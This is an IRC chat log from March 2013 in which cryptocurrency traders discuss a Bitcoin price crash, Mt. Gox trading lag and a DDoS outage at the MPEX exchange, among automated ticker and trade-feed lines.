vintage: 0.0052 seconds Mar 07 05:19:16 clark moody is fd up Mar 07 05:20:44 bitcoincharts feed has been dead for an hour Mar 07 05:21:00 [22:19] <@gribble> There are currently 2.189923 bitcoins demanded at or over 36.0 USD, worth 82.4772267629 USD in total. | Data vintage: 17.4769 Mar 07 05:21:01 [22:19] <@gribble> There are currently 181.27547 bitcoins offered at or under 42.0 USD, worth 7608.18637359 USD in total. | Data vintage: 35.9463 seconds Mar 07 05:21:24 I just checked on OTC. These spreads are ridiculous Mar 07 05:21:38 I wouldnt trust that Mar 07 05:21:52 there is basically no way of knowing what the price is Mar 07 05:21:56 Maybe delayed... but clarkmoody shows the same Mar 07 05:22:01 clarkmoody is dead Mar 07 05:22:05 It looks like the spread is gone Mar 07 05:22:08 breathe Mar 07 05:22:10 bitcoinity Mar 07 05:22:17 the bids/asks I mean Mar 07 05:22:22 the gox trade page has 0.04 spread Mar 07 05:22:25 ah Mar 07 05:22:27 lol Mar 07 05:22:32 back to 42 :) Mar 07 05:22:48 i think people just cant make orders at gox, so no vol so crazy movements Mar 07 05:22:55 dub: so does clarkmoody says, 0.04 spread Mar 07 05:22:56 .04 spread on the orders that were placed 10 minutes ago. What about the population that is in the queue ahead of you? Mar 07 05:23:45 its pretty lulzy Mar 07 05:24:11 the entire bitcoin economy is a casino at this point Mar 07 05:24:32 price is some random value between 33 and 49 Mar 07 05:24:59 and it's killing commerce Mar 07 05:25:17 yeah... it will stabilize around $1000 in a few years... Mar 07 05:25:20 These swings will undo all the adoption by serious businesses at this rate. Mar 07 05:25:28 hopefully Mar 07 05:25:42 as I keep saying, inb4 $2 Mar 07 05:26:08 mtgox must go away after this Mar 07 05:26:20 its been worse before Mar 07 05:26:48 I dunno if its still there but at one point a 20k btc trade halted teh engine until mark woke up and confirmed it Mar 07 05:26:48 yeah, but something better must be constructed, and then have peers that are the same in construction Mar 07 05:26:54 http://bitcoinity.org/markets Mar 07 05:26:59 as in, its a hard coded failsafe Mar 07 05:27:00 that graph looks like it's had a heart attack Mar 07 05:27:19 MtGox doesn't need to go. Just replace the hardware. It appears they are running on a Commodore 64 currently. Mar 07 05:27:24 Need an upgrade Mar 07 05:27:29 lol Mar 07 05:27:33 they're spending something like 10k a month on hardware. Mar 07 05:27:36 its not the hardware its teh retard driving it Mar 07 05:27:52 which is you kniow... more than the market cap of all but a few bitcoin businesses. Mar 07 05:28:17 thats insane Mar 07 05:28:21 $10K USD?! Mar 07 05:28:31 it's what they declare(d) Mar 07 05:29:15 i guess maybe for the hosting... *shrug*, but its got to be rebuilt better Mar 07 05:29:15 heh. mtgox jusrt stole .2 btc from me. Mar 07 05:29:27 i dunno why i went ahead and used them as a pp for some obscure host Mar 07 05:29:48 7 confirms, "There are not enough bitcoins on this address." Mar 07 05:30:00 in spite of you know, having showed it "about to confirm" earlier. Mar 07 05:30:07 when it had 5 Mar 07 05:31:29 :< Mar 07 05:31:34 lol 2013.. using gox! Mar 07 05:33:28 so what now Mar 07 05:33:29 ;;ticker Mar 07 05:33:33 BTCUSD ticker | Best bid: 41.36000, Best ask: 41.89000, Bid-ask spread: 0.53000, Last trade: 41.89000, 24 hour volume: 181522.58600462, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 42.83448 Mar 07 05:35:50 take a nap Mar 07 05:36:08 yeah im going afk.. crazyu shit Mar 07 05:37:32 ;;ticker Mar 07 05:37:35 BTCUSD ticker | Best bid: 40.31407, Best ask: 40.95000, Bid-ask spread: 0.63593, Last trade: 40.95000, 24 hour volume: 181582.58134847, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 42.83060 Mar 07 05:37:37 can we go to 50 please Mar 07 05:37:38 lol Mar 07 05:37:44 unlikely Mar 07 05:38:10 America just needs to go to bed Mar 07 05:38:18 and let gox recover Mar 07 05:38:39 http://betsofbitco.in/item?id=1054 Mar 07 05:38:41 I won this bet Mar 07 05:39:07 I feel that I should get a bit more than 0.3 for winning the bet. sigh Mar 07 05:39:23 hey, that's like 20 LTC! Mar 07 05:39:52 200 Mar 07 05:39:55 lol Mar 07 05:40:05 well i got .83 now Mar 07 05:40:10 it was 0,5 my bet Mar 07 05:40:11 mhm Mar 07 05:42:30 i missed the crash of 2013! Mar 07 05:42:57 ;;asks 49 Mar 07 05:43:07 ;;bc,stats Mar 07 05:43:10 Current Blocks: 224620 | Current Difficulty: 4367876.000842196 | Next Difficulty At Block: 225791 | Next Difficulty In: 1171 blocks | Next Difficulty In About: 1 week, 0 days, 12 hours, 9 minutes, and 13 seconds | Next Difficulty Estimate: 4738813.84956 | Estimated Percent Change: 8.49241 Mar 07 05:43:11 There are currently 22518.834 bitcoins offered at or under 49.0 USD, worth 1059107.62381 USD in total. | Data vintage: 0.0025 seconds Mar 07 05:43:15 ThickAsThieves: It won't be the last Mar 07 05:43:47 We have not seen REAL fear yet Mar 07 05:43:52 hopefully they won't be any bigger Mar 07 05:44:15 Protip : when the price is up more than $10 in a day, sell some. Mar 07 05:44:37 Set a bid at 33% below Mar 07 05:44:39 yep sell some USD to buy BTC Mar 07 05:44:40 ! Mar 07 05:44:47 [BTCTC] [S.DICE-PT] 9 @ 0.00549 = 0.0494 BTC [+] Mar 07 05:53:32 https://bitcointalk.org/index.php?topic=130117.msg1594354#msg1594354 Mar 07 05:54:39 pitty it didnt say 'so I whipped up assbot api integration'! Mar 07 05:55:39 totally. Mar 07 05:56:02 500 Internal Server Error Mar 07 05:56:02 nginx/1.2.1 Mar 07 05:56:19 who was saying this bitcoinity thing is the best since sliced mpex ? Mar 07 05:56:21 heh apparently SA hacked mpex Mar 07 05:56:21 oops Mar 07 05:56:35 dub haha Mar 07 05:56:47 don't tell me they just owned themselves. Mar 07 05:57:23 no, this is just some aspie shutin wisdom from the forum https://bitcointalk.org/index.php?topic=101902.msg1594343#msg1594343 Mar 07 05:57:33 meanwhile txs sent 3 hours ago are still unincluded Mar 07 05:57:42 dude people wanted bitcoin to be the new visa ? Mar 07 05:57:45 lay down the pipe. Mar 07 05:58:01 yeah back up to 3k unconfirmed Mar 07 05:58:35 you need to beat s.deuce fee of .001 to play bitcoin now Mar 07 05:58:39 increase th limit Mar 07 06:07:05 [BTCTC] [S.DICE-PT] 6 @ 0.00549 = 0.0329 BTC [+] Mar 07 06:08:52 http://i.imgur.com/4dhQMDS.png Mar 07 06:08:57 just saying Mar 07 06:09:40 ;;ticker Mar 07 06:09:41 BTCUSD ticker | Best bid: 41.25430, Best ask: 41.30000, Bid-ask spread: 0.04570, Last trade: 41.25330, 24 hour volume: 180985.14101528, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 42.80335 Mar 07 06:14:06 [BTCTC] [BTC-BOND] 100 @ 0.00999 = 0.999 BTC [+] Mar 07 06:16:06 [BTCTC] [GSDPT] 100 @ 0.0051 = 0.51 BTC [+] Mar 07 06:22:06 [HAVELOCK] [SDICE] 1 @ 0.4645 BTC [+] Mar 07 06:30:28 [BTCTC] [ASICMINER-PT] 1 @ 0.65 BTC [-] Mar 07 06:32:25 [BTCTC] [BTC-TRADING-PT] 2 @ 0.1537 = 0.3074 BTC [-] Mar 07 06:36:35 ;;ticker Mar 07 06:36:37 BTCUSD ticker | Best bid: 40.80000, Best ask: 40.90102, Bid-ask spread: 0.10102, Last trade: 40.80000, 24 hour volume: 182448.07724014, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 42.76346 Mar 07 06:36:43 what a crash Mar 07 06:36:55 actually i cant complain lol Mar 07 06:36:58 we need more good news Mar 07 06:37:07 how about warren buffer dumping 1 bil to play with Mar 07 06:37:11 buffet Mar 07 06:37:39 [BTCTC] [GSDPT] 608 @ 0.005 = 3.04 BTC [-] Mar 07 06:37:41 [BTCTC] [GSDPT] 7 @ 0.005 = 0.035 BTC [-] Mar 07 06:45:21 https://www.youtube.com/watch?v=Oeu_EMPd038 Mar 07 06:46:22 [BTCTC] [GSDPT] 8 @ 0.0049 = 0.0392 BTC [-] Mar 07 06:46:24 [BTCTC] [GSDPT] 1 @ 0.0048 BTC [-] Mar 07 06:46:26 [BTCTC] [GSDPT] 50 @ 0.0044 = 0.22 BTC [-] Mar 07 06:46:28 [BTCTC] [GSDPT] 10 @ 0.0044 = 0.044 BTC [-] Mar 07 06:46:30 [BTCTC] [GSDPT] 1 @ 0.00261 BTC [-] Mar 07 06:46:41 http://i.imgur.com/M3QffS5.jpg Mar 07 06:46:59 Nope Mar 07 06:47:13 We're in the bulltrap/return to normal Mar 07 06:49:52 I'm saying hello to 16-18 USD/BTC already Mar 07 06:51:03 ballz out Mar 07 06:51:33 wall street didn't play yet Mar 07 06:51:37 def bear trap Mar 07 06:52:08 if we're at that part of the bubble, we didn't start going parabolic yet... and what we've seen so far is "slow growth" Mar 07 06:52:33 So we'd hit like 10 000 USD/BTC at the peak or something... Mar 07 06:52:47 Why would "wall street" play? Mar 07 06:52:50 i thought that was wall street the last few days? Mar 07 06:53:13 n today Mar 07 06:53:37 i wonder how merchants went today that do pricing Mar 07 06:54:48 Seriously, why would the whole world suddenly adopt Bitcoins? It doesn't solve any of their problem nor is it convenient for their daily transactions. Mar 07 06:55:10 We reached the top of the speculative bubble with the near 50 USD/BTC today Mar 07 06:55:17 What I think. Mar 07 06:57:42 i dont think the whooooole world Mar 07 06:57:45 cash is still king Mar 07 06:58:28 but its very good replacement for credit cards Mar 07 07:00:01 [MPEX] [S.DICE] 100 @ 0.0046 = 0.46 BTC [-] Mar 07 07:06:13 ;;ticker Mar 07 07:06:24 Error: Failure to retrieve ticker. Try again later. Mar 07 07:06:38 mt goxxxxxxxx Mar 07 07:14:54 mtgox is dead dead... crazy Mar 07 07:15:41 ;;ticker Mar 07 07:15:43 BTCUSD ticker | Best bid: 40.39000, Best ask: 40.40002, Bid-ask spread: 0.01002, Last trade: 40.60000, 24 hour volume: 181729.26901555, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 42.70517 Mar 07 07:19:18 ;;ticker Mar 07 07:19:24 BTCUSD ticker | Best bid: 40.80001, Best ask: 40.84934, Bid-ask spread: 0.04933, Last trade: 40.80000, 24 hour volume: 182163.30359383, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 42.69988 Mar 07 07:19:40 49.09, the high of 2013 Mar 07 07:22:43 http://www.bitcoincharts.com/markets/mtgoxUSD.html Mar 07 07:23:03 I haven't seen the orderbook looking bearish like that since forever. Mar 07 07:23:37 still we are over $40 we were 12 at the new year Mar 07 07:23:52 that site wont load for me Mar 07 07:24:09 im damn pleased with anything stable over 30 Mar 07 07:24:12 [MPEX] [S.DICE] 200 @ 0.0046 = 0.92 BTC [-] Mar 07 07:24:21 but then i bought in at 3.5 :/ Mar 07 07:34:35 ;;ticker Mar 07 07:34:36 BTCUSD ticker | Best bid: 40.75068, Best ask: 41.00000, Bid-ask spread: 0.24932, Last trade: 40.75068, 24 hour volume: 181704.41636332, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 42.68779 Mar 07 07:41:57 [MPEX] [O.BTCUSD.C430T] 1000 @ 0.14351396 = 143.514 BTC [-] Mar 07 07:42:00 [MPEX] [O.BTCUSD.C410T] 1000 @ 0.1597016 = 159.7016 BTC [-] Mar 07 07:42:01 ;;ticker Mar 07 07:42:02 BTCUSD ticker | Best bid: 40.93627, Best ask: 41.00000, Bid-ask spread: 0.06373, Last trade: 41.00000, 24 hour volume: 181664.32887886, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 42.68317 Mar 07 07:42:08 [MPEX] [O.BTCUSD.C390T] 1000 @ 0.17755199 = 177.552 BTC [-] Mar 07 07:42:10 [MPEX] [O.BTCUSD.C370T] 1000 @ 0.19711386 = 197.1139 BTC [-] Mar 07 07:42:13 [MPEX] [O.BTCUSD.C350T] 1000 @ 0.21844012 = 218.4401 BTC [-] Mar 07 07:47:06 My TX wont confirm Mar 07 07:47:06 wtf Mar 07 07:47:20 nvm it confirmed now. 2 hour wait Mar 07 07:47:21 with tx Mar 07 07:47:22 lol Mar 07 07:52:47 yeah Mar 07 07:53:35 I received one with 0 fees... it's just not getting included at all no matter how long I wait... Mar 07 07:53:52 stupid no fee Mar 07 07:55:08 [BTCTC] [COGNITIVE] 1 @ 0.24 BTC [-] Mar 07 07:55:33 [BTCTC] [COGNITIVE] 1 @ 0.21 BTC [-] Mar 07 07:55:49 [BTCTC] [COGNITIVE] 1 @ 0.20704 BTC [-] Mar 07 07:56:47 should raise the min fee on dice Mar 07 07:56:55 [BTCTC] [BASIC-MINING] 2 @ 0.345 = 0.69 BTC [+] Mar 07 08:02:21 http://www.youtube.com/watch?v=F-X-Au9HrmI&feature=youtu.be Mar 07 08:02:25 check out about minute 3 Mar 07 08:02:36 keiser really likes bitcoin Mar 07 08:03:58 [MPEX] [S.MPOE] 12900 @ 0.00074252 = 9.5785 BTC [-] Mar 07 08:03:59 [MPEX] [S.MPOE] 1750 @ 0.00073731 = 1.2903 BTC [-] Mar 07 08:04:14 https://btct.co/security/CRYPTO-TRADE Mar 07 08:04:40 that's $160,000 USD for 20% of profits in IPO Mar 07 08:04:56 thems some big britches Mar 07 08:10:16 mp, this guy is following your PR advice http://forum.litecoin.net/index.php/topic,1125.msg7813.html#msg7813 Mar 07 08:10:23 4k btc ? Mar 07 08:10:53 yep Mar 07 08:11:05 is what they want Mar 07 08:11:52 suatmm Mar 07 08:12:00 lol Mar 07 08:12:23 ;;ticker Mar 07 08:12:24 BTCUSD ticker | Best bid: 41.50540, Best ask: 41.54691, Bid-ask spread: 0.04151, Last trade: 41.54691, 24 hour volume: 185495.99289508, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 42.64250 Mar 07 08:12:43 ;;tslb Mar 07 08:12:46 Time since last block: 3 minutes and 59 seconds Mar 07 08:16:35 [MPEX] [S.MPOE] 17650 @ 0.00075 = 13.2375 BTC [+] Mar 07 08:22:06 ;;ticker Mar 07 08:22:07 BTCUSD ticker | Best bid: 41.96634, Best ask: 41.96636, Bid-ask spread: 0.00002, Last trade: 41.96634, 24 hour volume: 185593.98262870, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 42.64002 Mar 07 08:30:03 ;;ticker Mar 07 08:30:05 BTCUSD ticker | Best bid: 42.10081, Best ask: 42.10082, Bid-ask spread: 0.00001, Last trade: 42.10082, 24 hour volume: 185130.68959519, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 42.63475 Mar 07 08:32:55 we need satoshi to go back Mar 07 08:33:00 and fix the blocksize limit Mar 07 08:41:56 let people add tx fees. Mar 07 08:43:15 just like the dude who sent 94 BTC as tx fee Mar 07 08:44:51 lol tya Mar 07 08:46:37 any word on gox? Mar 07 08:46:38 [MPEX] [S.MPOE] 13424 @ 0.00075 = 10.068 BTC [+] Mar 07 08:47:14 wheres that topic again Mar 07 08:47:19 of the dude who sent 94 BTC as tx Mar 07 08:50:22 I want to see that one Mar 07 08:56:25 bah bitcoincharts is crashed so bad Mar 07 09:07:43 who can think that BTC is ready for primetime with all these service failures Mar 07 09:07:58 needs another year in the oven Mar 07 09:10:21 maximian indeed. Mar 07 09:16:28 about gox... Mar 07 09:16:29 02:08 <@MagicalTux> Blitzboom: we're working on some changes that will improve this a lot Mar 07 09:16:30 02:08 < Blitzboom> ETA? Mar 07 09:16:30 02:08 <@MagicalTux> we're pushing this urgently (but still after testing), so whithin next 24 hours Mar 07 09:16:30 probably this update is being pushed to prod Mar 07 09:16:31 and it will be back within hours Mar 07 09:18:05 improve what? Mar 07 09:21:12 their 10 minute to half hour execution delay Mar 07 09:21:57 if you get a trade done in 30 mins seems you are lucky :/ Mar 07 09:22:20 however now it is starting to flow a bit Mar 07 09:22:26 ya, people went to bed Mar 07 09:22:48 yeah, i should too but its 2pm Mar 07 09:47:21 https://bitfunder.com/asset/G.ASICMINER-PT <-- graphs are now on a 15 sec live feed. no more refreshing to see trades Mar 07 09:48:14 Ukto, does the orderbook refill too? Mar 07 09:48:29 it will soon Mar 07 09:48:34 alot easier now Mar 07 09:48:34 ;;ticker Mar 07 09:48:35 BTCUSD ticker | Best bid: 42.08002, Best ask: 42.40000, Bid-ask spread: 0.31998, Last trade: 42.40000, 24 hour volume: 177673.50153615, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 42.48382 Mar 07 09:48:39 with the changes i setup tonight Mar 07 09:48:45 I was just taking a quick break from the big project Mar 07 09:48:55 I call that.. the bear trap Mar 07 10:01:46 ;;ticker Mar 07 10:01:47 BTCUSD ticker | Best bid: 42.20000, Best ask: 42.40000, Bid-ask spread: 0.20000, Last trade: 42.20000, 24 hour volume: 177432.50058775, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 42.47390 Mar 07 10:04:42 ;;goxlag Mar 07 10:04:43 441.561708 seconds Mar 07 10:10:07 440 sec lag? eternity... Mar 07 10:18:10 yeah. Mar 07 10:32:08 [MPEX] [S.DICE] 7411 @ 0.0046 = 34.0906 BTC [-] Mar 07 10:32:10 [MPEX] [S.DICE] 389 @ 0.00469999 = 1.8283 BTC [+] Mar 07 10:32:20 [MPEX] [S.DICE] 1200 @ 0.0048 = 5.76 BTC [+] Mar 07 10:32:26 ;;ticker Mar 07 10:32:27 BTCUSD ticker | Best bid: 42.90001, Best ask: 42.95100, Bid-ask spread: 0.05099, Last trade: 42.90001, 24 hour volume: 175372.31802034, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 42.41063 Mar 07 10:33:07 [HAVELOCK] [KCIM] 4 @ 1 = 4 BTC [+] Mar 07 10:40:06 [HAVELOCK] [KCIM] 3 @ 1 = 3 BTC [+] Mar 07 10:43:15 ;;ticker Mar 07 10:43:16 BTCUSD ticker | Best bid: 44.01590, Best ask: 44.12068, Bid-ask spread: 0.10478, Last trade: 44.01590, 24 hour volume: 177965.13484133, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 42.40520 Mar 07 10:44:37 movement at gox, and the direction is up Mar 07 10:50:08 The bear trap Mar 07 10:52:55 ;;goxlag Mar 07 10:52:55 0.687269 seconds Mar 07 10:57:00 ;;ticker Mar 07 10:57:00 BTCUSD ticker | Best bid: 44.17120, Best ask: 44.20001, Bid-ask spread: 0.02881, Last trade: 44.39000, 24 hour volume: 177233.90169868, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 42.37772 Mar 07 10:57:03 not bad Mar 07 10:57:18 well Mar 07 10:57:24 IT SHOULD BE 60 USD ALREDY Mar 07 10:57:27 BUY BUY BUY Mar 07 10:59:35 [MPEX] [S.MPOE] 10000 @ 0.00075 = 7.5 BTC [+] Mar 07 11:15:36 lol rebound ? Mar 07 11:15:58 [BTCTC] [ASICMINER-PT] 19 @ 0.65 = 12.35 BTC [-] Mar 07 11:16:39 [MPEX] [S.MPOE] 50000 @ 0.00075 = 37.5 BTC [+] Mar 07 11:16:45 mp hard to say if gox is even working Mar 07 11:16:55 for all we know gox is hand picking the trades Mar 07 11:17:30 yeah. Mar 07 11:17:41 mpoe hasn't been quoting for like 6 hours because it can't get a coherent feed Mar 07 11:19:38 http://bitcoinity.org/markets bitcoinity is back online at least. Mar 07 11:19:39 i heard mpex got ddos'd Mar 07 11:19:45 Anduck still going. Mar 07 11:19:55 well, anything you will do to stop it? Mar 07 11:20:04 nope. Mar 07 11:20:08 absorb it somewhere Mar 07 11:20:17 call ISP for dat? Mar 07 11:20:36 they've been playing muscial chairs for what, 12 hours now ? Mar 07 11:20:51 so your isp dont know how to absorb a ddos? Mar 07 11:21:26 is this some topic you fancy yourself an expert in ? Mar 07 11:21:41 no Mar 07 11:21:45 but isp should know how to fix it Mar 07 11:21:57 its shitty job but they should get it done by now Mar 07 11:22:00 sorta like the doctor should know how to make you healthy, right ? Mar 07 11:22:19 well i am 100% sure i know way more about these things than you do. Mar 07 11:22:22 what difference does it make anyway ? you're so desperate to read my blog today rather than tomorrow ? Mar 07 11:22:39 [BTCTC] [BASIC-MINING] 2 @ 0.33317 = 0.6663 BTC [-] Mar 07 11:22:48 no but it's just funny cuz you said "mpex cant be taken down" Mar 07 11:22:51 or smth similar - in your blog, yes Mar 07 11:23:01 i said it's immune to ddos. which it is. Mar 07 11:23:20 is it unusable right now-+- Mar 07 11:23:21 ? Mar 07 11:23:25 nope. Mar 07 11:23:29 ok Mar 07 11:23:32 can't you see it trading lol Mar 07 11:23:40 not really Mar 07 11:23:45 where would i see that? Mar 07 11:23:49 [MPEX] [S.MPOE] 50000 @ 0.00075 = 37.5 BTC [+] Mar 07 11:24:00 https://twitter.com/mpex1 Mar 07 11:24:53 ok Mar 07 11:25:26 that's kinda the idea. i saidf before a government couldn't take it down. Mar 07 11:25:34 today is the proof. ddos it ? fine. so ? Mar 07 11:25:37 who cares. Mar 07 11:26:08 [BTCTC] [S.MPOE-PT] 134 @ 0.0007 = 0.0938 BTC [-] Mar 07 11:27:15 [BTCTC] [S.BBET-PT] 15 @ 0.00182 = 0.0273 BTC [-] Mar 07 11:28:30 !ticker m s.mpoe Mar 07 11:28:40 duhh Mar 07 11:28:52 The eagle never lost so much time as when he submitted to learn from the crow. Mar 07 11:28:52 mircea_popescu: where can i see bid/ask of s.mpoe? Mar 07 11:29:15 "S.MPOE": {"1d": {"avg": "74815.940534","min": "69034","max": "75000","vsh": "4149547","vsa": "310452261595","cnt": "41"}, "7d": {"avg": "74981.9993279","min": "69034","max": "78628","vsh": "11012234","vsa": "825719322387","cnt": "218"}, "30d": {"avg": "68500.398679","min": "61530","max": "78628","vsh": "65503018","vsa": "4486982847676","cnt": "5975"}}, Mar 07 11:29:19 ty Mar 07 11:30:08 also http://mpex.coinbr.com/ Mar 07 11:30:19 which is also in the channel topic :) Mar 07 11:30:30 mircea_popescu: did someone buy s.mpoe a lot? Mar 07 11:30:37 past few days yeah Mar 07 11:30:39 i think i saw it at like 0.00060 or smth Mar 07 11:30:40 [BTCTC] [BTC-BOND] 2 @ 0.00986 = 0.0197 BTC [-] Mar 07 11:30:52 i put a 10mn shares block up at 75 monday Mar 07 11:30:56 and it's all but gone Mar 07 11:31:10 [BTCTC] [BTC-BOND] 48 @ 0.00982 = 0.4714 BTC [-] Mar 07 11:31:45 you took the wall off? Mar 07 11:31:51 no, it was bought Mar 07 11:32:00 no way all 10,000,000 was bought? Mar 07 11:32:09 gz! Mar 07 11:32:11 Hey, i'm with my friend and he wants to know how did Satoshi gain his powers? Mar 07 11:32:11 [BTCTC] [PAJKA.BOND] 4 @ 0.01552 = 0.0621 BTC [-] Mar 07 11:32:22 he talked to me. Mar 07 11:32:28 like 500k left Mar 07 11:32:37 he doesn't believe me that sataoshi blew himself up with his mind Mar 07 11:34:03 [BTCTC] [BTC-TRADING-PT] 2 @ 0.1394 = 0.2788 BTC [-] Mar 07 11:34:53 Mtgox trading engine lag: 10.51s Mar 07 11:34:57 it almost caught up actually. Mar 07 11:34:59 ;;ticker Mar 07 11:35:00 BTCUSD ticker | Best bid: 44.01000, Best ask: 44.10000, Bid-ask spread: 0.09000, Last trade: 44.50000, 24 hour volume: 173347.40604858, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 42.30310 Mar 07 11:35:18 [MPEX] [S.DICE] 58800 @ 0.0048 = 282.24 BTC [+] Mar 07 11:35:29 [MPEX] [S.DICE] 5851 @ 0.0055 = 32.1805 BTC [+] Mar 07 11:35:31 [MPEX] [S.DICE] 1000 @ 0.00564998 = 5.65 BTC [+] Mar 07 11:35:33 [MPEX] [S.DICE] 400 @ 0.005769 = 2.3076 BTC [+] Mar 07 11:35:34 [MPEX] [S.DICE] 157 @ 0.005779 = 0.9073 BTC [+] Mar 07 11:35:36 [MPEX] [S.DICE] 189 @ 0.005789 = 1.0941 BTC [+] Mar 07 11:35:45 [MPEX] [S.DICE] 2504 @ 0.00578949 = 14.4969 BTC [+] Mar 07 11:35:47 [MPEX] [S.DICE] 500 @ 0.00579999 = 2.9 BTC [+] Mar 07 11:35:49 [MPEX] [S.DICE] 1000 @ 0.00579999 = 5.8 BTC [+] Mar 07 11:35:51 [MPEX] [S.DICE] 9376 @ 0.00584168 = 54.7716 BTC [+] Mar 07 11:35:57 [MPEX] [S.DICE] 223 @ 0.00588401 = 1.3121 BTC [+] Mar 07 11:35:58 s.dice not dead after all :) Mar 07 11:36:16 just needed to meditate a little lol Mar 07 11:38:53 [BTCTC] [GSDPT] 1 @ 0.00596 BTC [+] Mar 07 11:39:09 [BTCTC] [GSDPT] 10 @ 0.00597 = 0.0597 BTC [+] Mar 07 11:39:35 [BTCTC] [ASICMINER-PT] 2 @ 0.65 = 1.3 BTC [-] Mar 07 11:43:26 [BTCTC] [S.DICE-PT] 25 @ 0.00545 = 0.1363 BTC [-] Mar 07 11:44:15 [BTCTC] [GSDPT] 19 @ 0.00599 = 0.1138 BTC [+] Mar 07 11:44:25 hey Mar 07 11:44:27 did asicminer pay divs? Mar 07 11:44:31 -again- Mar 07 11:44:33 [BTCTC] [S.DICE-PT] 5 @ 0.00545 = 0.0273 BTC [-] Mar 07 11:44:51 ya like 19 iirc Mar 07 11:44:57 ij Mar 07 11:44:57 ok Mar 07 11:50:17 so are we back to normal at gox, vol is okay? Mar 07 11:52:31 10 secondish Mar 07 11:52:53 yeah but is trade volume back, i can live with that delay Mar 07 11:53:49 when downloading the block chain, will more than 4 ram spead it up or is it only the cpu that matters? Mar 07 11:55:51 disk is the bottleneck iirc Mar 07 11:58:50 http://pokerfuse.com/features/in-depth/winpoker-bitcoin-comes-worlds-largest-online-poker-network-ipoker-06-03/ fuuuuck yeah Mar 07 12:02:09 mircea_popescu where is that list of proxies again? mpex.coinbr.com isn't responding for me (I hope juror isn't under attack now) Mar 07 12:02:27 jurov I should say Mar 07 12:09:40 both mpex.coinbr.com and mpex.co seem unavailable now. Mar 07 12:09:53 Someone is really DDoS'ing everything Mar 07 12:10:11 ;;tslb Mar 07 12:10:13 Time since last block: 3 minutes and 35 seconds Mar 07 12:10:22 yeah looks like coinbr.com is getting the DDoS treatment Mar 07 12:10:53 Who the fuck has time to DDoS stuff anyway Mar 07 12:11:12 someone who's really, really pissed off at MP Mar 07 12:11:12 [BTCTC] [GSDPT] 42 @ 0.00599 = 0.2516 BTC [+] Mar 07 12:12:00 probably extortion Mar 07 12:13:06 MP should have received a demand by now Mar 07 12:13:11 extortion seems possible Mar 07 12:14:02 If no one ever pays extortion, there goes the incentive. Anti-DDoS measures are more cost effective. Mar 07 12:19:05 hey all. Mar 07 12:19:30 mpex servers will be offline for a few hours. we are reconfiguring the router system, putting in new optics Mar 07 12:19:37 and doing a lot of other overhauling. Mar 07 12:20:00 no need to panic, all data is safe, by the time this is done mpex will have 10gb dedicated. Mar 07 12:20:16 and a few other perks. Mar 07 12:20:29 10 Gbps? Mar 07 12:20:38 yes. Mar 07 12:20:45 Seems massive. Mar 07 12:20:50 Good thing. Mar 07 12:20:53 hey. 1gb x2 seemed massive. Mar 07 12:21:14 I'll hog 2 or 3 all for myself. Mar 07 12:21:37 to avoid any possible inconsistencies in dbases i am taking the ordering offline tho. Mar 07 12:21:50 data may still be visible for a little bit. Mar 07 12:22:23 great Mar 07 12:22:23 Guess I'll go sleep and get back to trading tomorrow then. Mar 07 12:22:26 [MPEX] [S.MPOE] 6616 @ 0.00073732 = 4.8781 BTC [-] Mar 07 12:22:26 Goodbye. Mar 07 12:22:28 [MPEX] [S.MPOE] 2834 @ 0.00073731 = 2.0895 BTC [-] Mar 07 12:22:46 i'm going to sleep too. techs have it from here. Mar 07 12:26:13 hello Mar 07 12:27:02 coinbr has network dificulties, but it doesn't look like attack Mar 07 12:29:09 ;;ticker Mar 07 12:29:09 BTCUSD ticker | Best bid: 43.65507, Best ask: 43.99100, Bid-ask spread: 0.33593, Last trade: 43.65507, 24 hour volume: 169564.38034507, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 42.22189 Mar 07 12:31:04 ;;ticker Mar 07 12:31:04 BTCUSD ticker | Best bid: 43.50000, Best ask: 43.54000, Bid-ask spread: 0.04000, Last trade: 43.54000, 24 hour volume: 170125.43926848, 24 hour low: 33.30000, 24 hour high: 49.09900, 24 hour vwap: 42.22377 Mar 07 12:32:03 BF last 24hrs, over 450btc vol Mar 07 12:33:09 BF ticker :) Mar 07 12:38:52 so mpex is completely offline now, right? Mar 07 12:39:22 you can send a sign order via snail mail Mar 07 12:39:29 singed Mar 07 12:39:45 okay... just situational awareness Mar 07 12:40:21 and next time i meet Namworld i do something nasty to him Mar 07 12:40:46 he knows coinbr is on bitvps, plus i reminded him yest Mar 07 12:41:12 but he was talking about it being attacked as if it was no concern for him **** BEGIN LOGGING AT Thu Mar 7 19:26:16 2013 Mar 07 19:28:49 sooo what's new ? Mar 07 19:30:00 a bunch of emotionally drained bitcoin crazed monkeys. Mar 07 19:30:02 so nothing new. Mar 07 19:30:28 haha sounds about right Mar 07 19:30:33 jurov did you get nuked in the end ? Mar 07 19:34:14 [BTCTC] [COGNITIVE] 1 @ 0.18001 BTC [-] Mar 07 19:34:16 [BTCTC] [COGNITIVE] 1 @ 0.18001 BTC [-] Mar 07 19:38:30 mircea_popescu, it's still not clear it it was really me Mar 07 19:38:34 [18:31] yea there is a massive amount of traffic hitting the node Mar 07 19:39:29 lol mkay Mar 07 19:40:04 CoinBr under maintenance/overhaul, should be available before March 8. Contact us on support()coinbr.com . Mar 07 19:40:12 i get that much. Mar 07 19:40:40 well, this is new server. the original one is not reachable Mar 07 19:40:44 o Mar 07 19:40:53 cool. Mar 07 19:41:00 should it stay unreachable, i'll install everything there Mar 07 19:41:08 it's funny, last year the forum crowd was all aggitated about "o, da gubbinmint" Mar 07 